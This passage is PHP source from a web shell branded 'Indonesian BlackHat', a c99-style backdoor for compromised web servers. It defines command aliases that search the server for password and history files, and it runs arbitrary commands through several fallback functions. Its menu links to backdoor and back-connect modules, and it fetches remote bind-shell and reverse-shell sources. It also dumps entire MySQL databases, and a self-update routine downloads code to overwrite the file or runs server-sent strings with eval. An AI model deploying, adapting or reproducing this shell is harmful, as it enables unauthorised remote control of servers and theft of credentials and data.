  408.     array("find all service.pwd files", "find / -type f -name service.pwd"),
  409.     array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
  410.     array("find all .htpasswd files", "find / -type f -name .htpasswd"),
  411.     array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
  412.     array("find all .bash_history files", "find / -type f -name .bash_history"),
  413.     array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
  414.     array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
  415.     array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
  416.     array("list file attributes on a Linux second extended file system", "lsattr -va"),
  417.     array("show opened ports", "netstat -an | grep -i listen")
  418.  );
  419. } else {
  420. $cmdaliases = array(
  421.     array("-----------------------------------------------------------", "dir"),
  422.     array("show opened ports", "netstat -an")
  423.  );
  424. }
  425. $sess_cookie = "J4MBR0NG"; // Cookie-variable name
  426. $usefsbuff = TRUE; //Buffer-function
  427. $copy_unset = FALSE; //Remove copied files from buffer after pasting
  428. $quicklaunch = array(
  429.     array("<center>Home",$surl),
  430.     array("Back","#\" onclick=\"history.back(1)"),
  431.     array("Forward","#\" onclick=\"history.go(1)"),
  432.     array("Up",$surl."xtux=ls&d=%upd&sort=%sort"),
  433.     array("Refresh",""),
  434.     array("Search",$surl."xtux=search&d=%d"),
  435.     array("<br /><br />"),
  436.     array("Tools",$surl."xtux=tools"),
  437.     array("ps aux",$surl."xtux=processes"),
  438.     array("Encoder",$surl."xtux=encoder"),
  439.     array("Infobox",$surl."xtux=security"),
  440.     array("MySQL Manager",$surl."act=sql"),
  441.     array("Packet Storm",$packet),
  442.     array("<br /><br />"),
  443.     array("Readable dir",$surl."xtux=finder"),
  444.     array("Backdoor",$surl."xtux=shbd"),
  445.     array("Back Connect",$surl."xtux=backc"),
  446.     array("Remove",$surl."xtux=selfremove")
  447. );
  448. //Highlight syntax code colors
  449. $highlight_background = "transparent";
  450. $highlight_bg = "#FFFFFF";
  451. $highlight_comment = "#6A6A6A";
  452. $highlight_default = "#0F0";
  453. $highlight_html = "#090";
  454. $highlight_keyword = "#007700";
  455. $highlight_string = "#FF0000";
  456.  
  457. @$f = $_REQUEST["f"];
  458. @extract($_REQUEST["TuXcook"]);
  459.  
  460. //END CONFIGURATION
  461. @set_time_limit(0);
  462. $tmp = array();
  463. foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
  464. $s = "!^(".implode("|",$tmp).")$!i";
  465. if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://indonesianblackhat.web.id\">indonesianblackhat</a> - your host (".getenv("REMOTE_ADDR").") not allow");}
  466. if (!empty($login))
  467. {
  468.  if (empty($md5_pass)) {$md5_pass = md5($pass);}
  469.  if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
  470.  {
  471.   if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
  472.   header("WWW-Authenticate: Basic realm=\"Version".$O2XDAVer.": ".$login_txt."\"");
  473.   header("HTTP/1.0 401 Unauthorized");
  474.   exit($accessdeniedmess);
  475.  }
  476. }
  477. if ($xtux != "img")
  478. {
  479. $lastdir = realpath(".");
  480. chdir($curdir);
  481. if ($selfwrite or $updatenow) {@ob_clean(); TuX_getupdate($selfwrite,1); exit;}
  482. $sess_data = unserialize($_COOKIE["$sess_cookie"]);
  483. if (!is_array($sess_data)) {$sess_data = array();}
  484. if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
  485. if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
  486.  
  487. $disablefunc = @ini_get("disable_functions");
  488. if (!empty($disablefunc))
  489. {
  490.  $disablefunc = str_replace(" ","",$disablefunc);
  491.  $disablefunc = explode(",",$disablefunc);
  492. }
  493.  
  494. if (!function_exists("c99_buff_prepare"))
  495. {
  496. function c99_buff_prepare()
  497. {
  498.     global $sess_data;
  499.     global $xtux;
  500.     foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  501.     foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  502. $sess_data["copy"] = array_unique($sess_data["copy"]);
  503. $sess_data["cut"] = array_unique($sess_data["cut"]);
  504.     sort($sess_data["copy"]);
  505.     sort($sess_data["cut"]);
  506.     if ($xtux != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}
  507.     } else {
  508.     foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
  509. }
  510. }
  511. c99_buff_prepare();
  512.  
  513. if (!function_exists("c99_sess_put"))
  514. {
  515. function c99_sess_put($data)
  516. {
  517.     global $sess_cookie;
  518.     global $sess_data;
  519.     c99_buff_prepare();
  520. $sess_data = $data;
  521. $data = serialize($data);
  522.     setcookie($sess_cookie,$data);
  523. }
  524. }
  525. foreach (array("sort","sql_sort") as $v)
  526. {
  527.     if (!empty($_GET[$v])) {$$v = $_GET[$v];}
  528.     if (!empty($_POST[$v])) {$$v = $_POST[$v];}
  529. }
  530. if ($sort_save)
  531. {
  532.     if (!empty($sort)) {setcookie("sort",$sort);}
  533.     if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
  534. }
  535. if (!function_exists("str2mini"))
  536. {
  537. function str2mini($content,$len)
  538. {
  539.     if (strlen($content) > $len)
  540.  {
  541. $len = ceil($len/2) - 2;
  542.     return substr($content, 0,$len)."...".substr($content,-$len);  } else {
  543.     return $content;}
  544. }
  545. }
  546. if (!function_exists("view_size"))
  547. {
  548. function view_size($size)
  549. {
  550.     if (!is_numeric($size)) {return FALSE; } else {
  551.     if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
  552.     elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
  553.     elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB"; } else {
  554.     $size = $size . " B";}
  555.     return $size;
  556.  }
  557. }
  558. }
  559. if (!function_exists("fs_copy_dir"))
  560. {
  561. function fs_copy_dir($d,$t)
  562. {
  563.  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  564.  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  565.  $h = opendir($d);
  566.  while (($o = readdir($h)) !== FALSE)
  567.  {
  568.   if (($o != ".") and ($o != ".."))
  569.   {
  570.    if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o); } else {
  571.     $ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  572.    if (!$ret) {return $ret;}
  573.   }
  574.  }
  575.  closedir($h);
  576.  return TRUE;
  577. }
  578. }
  579. if (!function_exists("fs_copy_obj"))
  580. {
  581. function fs_copy_obj($d,$t)
  582. {
  583.  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  584.  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  585.  if (!is_dir(dirname($t))) {mkdir(dirname($t));}
  586.  if (is_dir($d))
  587.  {
  588.     if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  589.     if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  590.     return fs_copy_dir($d,$t);
  591.  }
  592.     elseif (is_file($d)) {return copy($d,$t);
  593.     } else {
  594.     return FALSE;}
  595. }
  596. }
  597. if (!function_exists("fs_move_dir"))
  598. {
  599. function fs_move_dir($d,$t)
  600. {
  601.  $h = opendir($d);
  602.  if (!is_dir($t)) {mkdir($t);}
  603.  while (($o = readdir($h)) !== FALSE)
  604.  {
  605.   if (($o != ".") and ($o != ".."))
  606.   {
  607.    $ret = TRUE;
  608.     if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o); } else {
  609.     if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
  610.     if (!$ret) {return $ret;}
  611.     }
  612.      }
  613.     closedir($h);
  614.     return TRUE;
  615. }
  616. }
  617. if (!function_exists("fs_move_obj"))
  618. {
  619. function fs_move_obj($d,$t)
  620. {
  621.  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  622.  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  623.  if (is_dir($d))
  624.  {
  625.   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  626.   if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  627.   return fs_move_dir($d,$t);
  628.  }
  629.  elseif (is_file($d))
  630. {
  631.     if(copy($d,$t)) {return unlink($d); } else {
  632.     unlink($t); return FALSE;}
  633.     } else {
  634.     return FALSE;}
  635. }
  636. }
  637. if (!function_exists("fs_rmdir"))
  638. {
  639. function fs_rmdir($d)
  640. {
  641.  $h = opendir($d);
  642.  while (($o = readdir($h)) !== FALSE)
  643.  {
  644.   if (($o != ".") and ($o != ".."))
  645.   {
  646.     if (!is_dir($d.$o)) {unlink($d.$o); } else {
  647.     fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
  648.   }
  649.  }
  650.  closedir($h);
  651.  rmdir($d);
  652.  return !is_dir($d);
  653. }
  654. }
  655. if (!function_exists("fs_rmobj"))
  656. {
  657. function fs_rmobj($o)
  658. {
  659. $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
  660.     if (is_dir($o))
  661.     {
  662.     if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
  663.     return fs_rmdir($o);
  664.     }
  665.     elseif (is_file($o)) {return unlink($o);
  666.     } else { return FALSE;}
  667. }
  668. }
  669. if (!function_exists("o2xdaexec"))
  670. {
  671. function o2xdaexec($cmd)
  672. {
  673.  global $disablefunc;
  674.  $result = "";
  675.  if (!empty($cmd))
  676.  {
  677.   if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  678.   elseif (($result = `$cmd`) !== FALSE) {}
  679.   elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  680.   elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  681.   elseif (is_resource($fp = popen($cmd,"r")))
  682.   {
  683.    $result = "";
  684.    while(!feof($fp)) {$result .= fread($fp,1024);}
  685.    pclose($fp);
  686.   }
  687.  }
  688.  return $result;
  689. }
  690. }
  691. if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
  692. if (!function_exists("view_perms"))
  693. {
  694. function view_perms($mode)
  695. {
  696.  if (($mode & 0xC000) === 0xC000) {$type = "s";}
  697.  elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
  698.  elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
  699.  elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
  700.  elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
  701.  elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
  702.  elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
  703.  else {$type = "?";}
  704.  
  705.  $owner["read"] = ($mode & 00400)?"r":"-";
  706.  $owner["write"] = ($mode & 00200)?"w":"-";
  707.  $owner["execute"] = ($mode & 00100)?"x":"-";
  708.  $group["read"] = ($mode & 00040)?"r":"-";
  709.  $group["write"] = ($mode & 00020)?"w":"-";
  710.  $group["execute"] = ($mode & 00010)?"x":"-";
  711.  $world["read"] = ($mode & 00004)?"r":"-";
  712.  $world["write"] = ($mode & 00002)? "w":"-";
  713.  $world["execute"] = ($mode & 00001)?"x":"-";
  714.  
  715.  if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
  716.  if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
  717.  if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
  718.  
  719.  return $type.join("",$owner).join("",$group).join("",$world);
  720. }
  721. }
  722. if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
  723. if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
  724. if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
  725. if (!function_exists("parse_perms"))
  726. {
  727. function parse_perms($mode)
  728. {
  729.  if (($mode & 0xC000) === 0xC000) {$t = "s";}
  730.  elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
  731.  elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
  732.  elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
  733.  elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
  734.  elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
  735.  elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
  736.  else {$t = "?";}
  737.  $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
  738.  $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
  739.  $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
  740.  return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
  741. }
  742. }
  743. if (!function_exists("parsesort"))
  744. {
  745. function parsesort($sort)
  746. {
  747.  $one = intval($sort);
  748.  $second = substr($sort,-1);
  749.  if ($second != "d") {$second = "a";}
  750.  return array($one,$second);
  751. }
  752. }
  753. if (!function_exists("view_perms_color"))
  754. {
  755. function view_perms_color($o)
  756. {
  757.  if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
  758.  elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
  759.  else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
  760. }
  761. }
  762. if (!function_exists("c99getsource"))
  763. {
  764. function c99getsource($fn)
  765. {
  766.  global $TuX_sourcesurl;
  767. $array = array(
  768.   "TuX_bindport.pl" => "TuX_bindport_pl.txt",
  769.   "TuX_bindport.c" => "TuX_bindport_c.txt",
  770.   "TuX_backconn.pl" => "TuX_backconn_pl.txt",
  771.   "TuX_backconn.c" => "TuX_backconn_c.txt",
  772.   "TuX_datapipe.pl" => "TuX_datapipe_pl.txt",
  773.   "TuX_datapipe.c" => "TuX_datapipe_c.txt",
  774. );
  775.     $name = $array[$fn];
  776.     if ($name) {return file_get_contents($TuX_sourcesurl.$name);
  777.     } else { return FALSE;}
  778. }
  779. }
  780. if (!function_exists("TuX_getupdate"))
  781. {
  782. function TuX_getupdate($update = TRUE)
  783. {
  784. $url = $GLOBALS["TuX_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
  785. $data = @file_get_contents($url);
  786.     if (!$data) {return "Can't connect to update-server!"; } else {
  787.     $data = ltrim($data);
  788.     $string = substr($data,3,ord($data{2}));
  789.     if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
  790.     if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
  791.     if ($data{0} == "\x99" and $data{1} == "\x03")
  792.     {
  793. $string = explode("\x01",$string);
  794. if ($update)
  795.    {
  796.     $confvars = array();
  797.     $sourceurl = $string[0];
  798.     $source = file_get_contents($sourceurl);
  799.     if (!$source) {return "Can't fetch update!"; } else {
  800.     $fp = fopen(__FILE__,"w");
  801.     if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download x2300.php manually <a href=\"".$sourceurl."\"><u>here</u></a>."; } else {
  802.     fwrite($fp,$source); fclose($fp); return "Update success.";}
  803.     }
  804.    } else {
  805.     return "New version are available: ".$string[1];}
  806.   }
  807.     elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1; } else {
  808.     return "Error in protocol: segmentation failed! (".$data.") ";}
  809.  }
  810. }
  811. }
  812. if (!function_exists("mysql_dump"))
  813. {
  814. function mysql_dump($set)
  815. {
  816.  global $O2XDAVer;
  817.  $sock = $set["sock"];
  818.  $db = $set["db"];
  819.  $print = $set["print"];
  820.  $nl2br = $set["nl2br"];
  821.  $file = $set["file"];
  822.  $add_drop = $set["add_drop"];
  823.  $tabs = $set["tabs"];
  824.  $onlytabs = $set["onlytabs"];
  825.  $ret = array();
  826.  $ret["err"] = array();
  827.  if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
  828.  if (empty($db)) {$db = "db";}
  829.  if (empty($print)) {$print = 0;}
  830.  if (empty($nl2br)) {$nl2br = 0;}
  831.  if (empty($add_drop)) {$add_drop = TRUE;}
  832.  if (empty($file))
  833.  {
  834.   $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
  835.  }
  836.  if (!is_array($tabs)) {$tabs = array();}
  837.  if (empty($add_drop)) {$add_drop = TRUE;}
  838.  if (sizeof($tabs) == 0)
  839.  {
  840.   // retrive tables-list
  841.   $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
  842.   if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
  843.  }
  844.  $out = "# Dumped by Indonesian BlackHat
  845. # Home page: http://indonesianblackhat.web.id
  846. # Host settings:
  847. # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
  848. # Date: ".date("d.m.Y H:i:s")."
  849. # DB: \"".$db."\"
  850. #---------------------------------------------------------
  851. ";
  852. $c = count($onlytabs);
  853.     foreach($tabs as $tab)
  854. {
  855.     if ((in_array($tab,$onlytabs)) or (!$c))
  856. {
  857.     if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
  858. // recieve query for create table structure
  859. $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
  860.     if (!$res) {$ret["err"][] = mysql_smarterror(); } else {
  861. $row = mysql_fetch_row($res);
  862. $out .= $row["1"].";\n\n";
  863. // recieve table variables
  864. $res = mysql_query("SELECT * FROM `$tab`", $sock);
  865. if (mysql_num_rows($res) > 0)
  866. {
  867.      while ($row = mysql_fetch_assoc($res))
  868. {
  869. $keys = implode("`, `", array_keys($row));
  870. $values = array_values($row);
  871.       foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
  872. $values = implode("', '", $values);
  873. $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
  874. $out .= $sql;
  875.      }
  876.     }
  877.    }
  878.   }
  879.  }
  880. $out .= "#---------------------------------------------------------------------------------\n\n";
  881.     if ($file)
  882.  {
  883. $fp = fopen($file, "w");
  884.     if (!$fp) {$ret["err"][] = 2; } else {
  885.     fwrite ($fp, $out);
  886.     fclose ($fp);
  887.   }
  888.  }
  889. if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
  890. return $out;
  891. }
  892. }
  893. if (!function_exists("mysql_buildwhere"))
  894. {
  895. function mysql_buildwhere($array,$sep=" and",$functs=array())
  896. {
  897.  if (!is_array($array)) {$array = array();}
  898.  $result = "";
  899.  foreach($array as $k=>$v)
  900.  {
  901.   $value = "";
  902.   if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
  903.   $value .= "'".addslashes($v)."'";
  904.   if (!empty($functs[$k])) {$value .= ")";}
  905.   $result .= "`".$k."` = ".$value.$sep;
  906.  }
  907.  $result = substr($result,0,strlen($result)-strlen($sep));
  908.  return $result;
  909. }
  910. }
  911. if (!function_exists("mysql_fetch_all"))
  912. {
  913. function mysql_fetch_all($query,$sock)
  914. {
  915.  if ($sock) {$result = mysql_query($query,$sock);
  916.     } else {
  917. $result = mysql_query($query);}
  918. $array = array();
  919.     while ($row = mysql_fetch_array($result)) {$array[] = $row;}
  920.     mysql_free_result($result);
  921.     return $array;
  922. }
  923. }
  924. if (!function_exists("mysql_smarterror"))
  925. {
  926. function mysql_smarterror($type,$sock)
  927. {
  928.  if ($sock) {$error = mysql_error($sock);
  929.     } else {
  930. $error = mysql_error();}
  931. $error = htmlspecialchars($error);
  932. return $error;
  933. }
  934. }
  935. if (!function_exists("mysql_query_form"))
  936. {
  937. function mysql_query_form()
  938. {
  939. global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
  940. if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error: <br>".$sql_query_error."<br>";}
  941. if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  942. if ((!$submit) or ($sql_act))
  943. {
  944. echo "<table border=0><tr><td><form name=\"TuX_sqlquery\" method=POST>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":<br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=xtux value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
  945.   if ($tbl_struct)
  946.   {
  947.    echo "<td valign=\"top\">Fields:<br>";
  948.    foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.TuX_sqlquery.sql_query.value+='`".$name."`';\">".$name."</a><br>";}
  949.    echo "</td></tr></table>";
  950.   }
  951.  }
  952.  if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
  953. }
  954. }
  955. if (!function_exists("mysql_create_db"))
  956. {
  957. function mysql_create_db($db,$sock="")
  958. {
  959. $sql = "CREATE DATABASE `".addslashes($db)."`;";
  960.     if ($sock) {return mysql_query($sql,$sock); } else {
  961.     return mysql_query($sql);}
  962. }
  963. }
  964. if (!function_exists("mysql_query_parse"))
  965. {
  966. function mysql_query_parse($query)
  967. {
  968.  $query = trim($query);
  969.  $arr = explode (" ",$query);
  970.  $types = array(
  971.   "SELECT"=>array(3,1),
  972.   "SHOW"=>array(2,1),
  973.   "DELETE"=>array(1),
  974.   "DROP"=>array(1)
  975.  );
  976.  $result = array();
  977.  $op = strtoupper($arr[0]);
  978.  if (is_array($types[$op]))
  979.  {
  980.   $result["propertions"] = $types[$op];
  981.   $result["query"]  = $query;
  982.   if ($types[$op] == 2)
  983.   {
  984.    foreach($arr as $k=>$v)
  985.    {
  986.     if (strtoupper($v) == "LIMIT")
  987.     {
  988.      $result["limit"] = $arr[$k+1];
  989.      $result["limit"] = explode(",",$result["limit"]);
  990.      if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
  991.      unset($arr[$k],$arr[$k+1]);
  992.     }
  993.    }
  994.   }
  995.  } else {
  996. return FALSE;}
  997. }
  998. }
  999. if (!function_exists("c99fsearch"))
  1000. {
  1001. function c99fsearch($d)
  1002. {
  1003.  global $found;
  1004.  global $found_d;
  1005.  global $found_f;
  1006.  global $search_i_f;
  1007.  global $search_i_d;
  1008.  global $a;
  1009.  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  1010.  $h = opendir($d);
  1011.  while (($f = readdir($h)) !== FALSE)
  1012.  {
  1013.   if($f != "." && $f != "..")
  1014.   {
  1015.    $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
  1016.    if (is_dir($d.$f))
  1017.    {
  1018.     $search_i_d++;
  1019.     if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
  1020.     if (!is_link($d.$f)) {c99fsearch($d.$f);}
  1021.    } else {
  1022.     $search_i_f++;
  1023.     if ($bool)
  1024.     {
  1025.      if (!empty($a["text"]))
  1026.      {
  1027.     $r = @file_get_contents($d.$f);
  1028.     if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
  1029.     if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
  1030.     if ($a["text_regexp"]) {$bool = ereg($a["text"],$r); } else {
  1031.     $bool = strpos(" ".$r,$a["text"],1);}
  1032.     if ($a["text_not"]) {$bool = !$bool;}
  1033.     if ($bool) {$found[] = $d.$f; $found_f++;}
  1034.     } else {
  1035.     $found[] = $d.$f; $found_f++;}
  1036.     }
  1037.    }
  1038.   }
  1039.  }
  1040.  closedir($h);
  1041. }
  1042. }
  1043. if ($xtux == "gofile") {if (is_dir($f)) {$xtux = "ls"; $d = $f;} else {$xtux = "f"; $d = dirname($f); $f = basename($f);}}
  1044. //Sending headers
  1045. @ob_start();
  1046. @ob_implicit_flush(0);
  1047. function onphpshutdown()
  1048. {
  1049.  global $gzipencode,$ft;
  1050.  if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
  1051.  {
  1052.   $v = @ob_get_contents();
  1053.   @ob_end_clean();
  1054.   @ob_start("ob_gzHandler");
  1055.   echo $v;
  1056.   @ob_end_flush();
  1057.  }
  1058. }
  1059. function TuXexit()
  1060. {
  1061.  onphpshutdown();
  1062.  exit;
  1063. }
  1064. header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
  1065. header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
  1066. header("Cache-Control: no-store, no-cache, must-revalidate");
  1067. header("Cache-Control: post-check=0, pre-check=0", FALSE);
  1068. header("Pragma: no-cache");
  1069. if (empty($tmpdir))
  1070. {
  1071.  $tmpdir = ini_get("upload_tmp_dir");
  1072.  if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
  1073. }
  1074. $tmpdir = realpath($tmpdir);
  1075. $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
  1076. if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
  1077. if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir; } else {
  1078. $tmpdir_logs = realpath($tmpdir_logs);}
  1079. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
  1080. {
  1081.     $safemode = TRUE;
  1082.     $hsafemode = "<font color=red>Activated</font>";  } else {
  1083.     $safemode = FALSE; $hsafemode = "<font color=green>Deactivated</font>";}
  1084.     $v = @ini_get("open_basedir");
  1085. if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";
  1086. } else {
  1087. $openbasedir = FALSE; $hopenbasedir = "<font color=green>Deactivated</font>";}
  1088. $sort = htmlspecialchars($sort);
  1089. if (empty($sort)) {$sort = $sort_default;}
  1090. $sort[1] = strtolower($sort[1]);
  1091. $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
  1092. if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
  1093. $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."xtux=phpinfo\" target=\"_blank\">PHP/".phpversion()."</a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
  1094. @ini_set("highlight.bg",$highlight_bg); //FFFFFF
  1095. @ini_set("highlight.comment",$highlight_comment); //#FF8000
  1096. @ini_set("highlight.default",$highlight_default); //#0000BB
  1097. @ini_set("highlight.html",$highlight_html); //#000000
  1098. @ini_set("highlight.keyword",$highlight_keyword); //#007700
  1099. @ini_set("highlight.string",$highlight_string); //#DD0000
  1100. if (!is_array($xtuxbox)) {$xtuxbox = array();}
  1101. $dspact = $xtux = htmlspecialchars($xtux);
  1102. $disp_fullpath = $ls_arr = $notls = null;
  1103. $ud = urlencode($d);
  1104. ?><html><head>
  1105. <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
  1106. <meta http-equiv="Content-Language" content="en-us">
  1107. <title>&#60;&#60; back | <?php echo getenv("HTTP_HOST"); ?> -</title>
  1108. <STYLE>
  1109. TD { FONT-SIZE: 8pt; COLOR: #009900; FONT-FAMILY: verdana; }
  1110. body { scrollbar-face-color: #009900; scrollbar-shadow-color: #000000; scrollbar-highlight-color: #00CC00;
  1111. scrollbar-3dlight-color: #00CC00; scrollbar-darkshadow-color: #009900; scrollbar-track-color: #101010;
  1112. scrollbar-arrow-color: #101010; background:url(http://www.blackhat.com/images/body-bg.png) no-repeat; background-color: #000000; font-family:Arial, Helvetica, sans-serif; }
